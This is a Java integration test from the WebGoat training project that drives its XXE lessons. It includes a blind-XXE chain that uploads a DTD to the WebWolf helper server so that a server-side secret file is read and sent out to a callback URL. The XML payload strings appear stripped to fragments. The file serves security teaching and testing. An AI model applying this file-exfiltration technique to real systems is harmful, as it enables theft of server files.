/* * SPDX-FileCopyrightText: Copyright © 2019 WebGoat authors * SPDX-License-Identifier: GPL-2.0-or-later */ package org.owasp.webgoat.integration; import io.restassured.RestAssured; import io.restassured.http.ContentType; import java.io.IOException; import org.junit.jupiter.api.Test; public class XXEIntegrationTest extends IntegrationTest { private static final String xxe3 = """ ]>&xxe;test """; private static final String xxe4 = """ ]>&xxe;test """; private static final String dtd7 = """ ">%all; """; private static final String xxe7 = """ %remote;]>test&send; """; private String webGoatHomeDirectory; // TODO fix me // /* // * This test is to verify that all is secure when XXE security patch is applied. // */ // @Test // public void xxeSecure() throws IOException { // startLesson("XXE"); // webGoatHomeDirectory = webGoatServerDirectory(); // RestAssured.given() // .when() // .relaxedHTTPSValidation() // .cookie("JSESSIONID", getWebGoatCookie()) // .get(url("service/enable-security.mvc")) // .then() // .statusCode(200); // checkAssignment(url("xxe/simple"), ContentType.XML, xxe3, false); // checkAssignment(url("xxe/content-type"), ContentType.XML, xxe4, false); // checkAssignment( // url("xxe/blind"), // ContentType.XML, // "" + getSecret() + "", // false); // } /** * This performs the steps of the exercise before the secret can be committed in the final step. * * @return */ private String getSecret() { String secretFile = webGoatHomeDirectory.concat("/XXE/" + getUser() + "/secret.txt"); String webWolfCallback = new WebWolfUrlBuilder().path("landing").attackMode().build(); String dtd7String = dtd7.replace("WEBWOLFURL", webWolfCallback).replace("SECRET", secretFile); // upload DTD RestAssured.given() .when() .relaxedHTTPSValidation() .cookie("WEBWOLFSESSION", getWebWolfCookie()) .multiPart("file", "blind.dtd", dtd7String.getBytes()) .post(new WebWolfUrlBuilder().path("fileupload").build()) .then() .extract() .response() .getBody() .asString(); // upload attack String xxe7String = xxe7.replace("WEBWOLFURL", new WebWolfUrlBuilder().attackMode().path("files").build()) .replace("USERNAME", this.getUser()); checkAssignment(url("xxe/blind"), ContentType.XML, xxe7String, false); // read results from WebWolf String result = RestAssured.given() .when() .relaxedHTTPSValidation() .cookie("WEBWOLFSESSION", getWebWolfCookie()) .get(new WebWolfUrlBuilder().path("requests").build()) .then() .extract() .response() .getBody() .asString(); result = result.replace("%20", " "); if (-1 != result.lastIndexOf("WebGoat 8.0 rocks... (")) { result = result.substring( result.lastIndexOf("WebGoat 8.0 rocks... ("), result.lastIndexOf("WebGoat 8.0 rocks... (") + 33); } return result; } @Test public void runTests() throws IOException { startLesson("XXE", true); webGoatHomeDirectory = webGoatServerDirectory(); checkAssignment(url("xxe/simple"), ContentType.XML, xxe3, true); checkAssignment(url("xxe/content-type"), ContentType.XML, xxe4, true); checkAssignment( url("xxe/blind"), ContentType.XML, "" + getSecret() + "", true); checkResults("XXE"); } }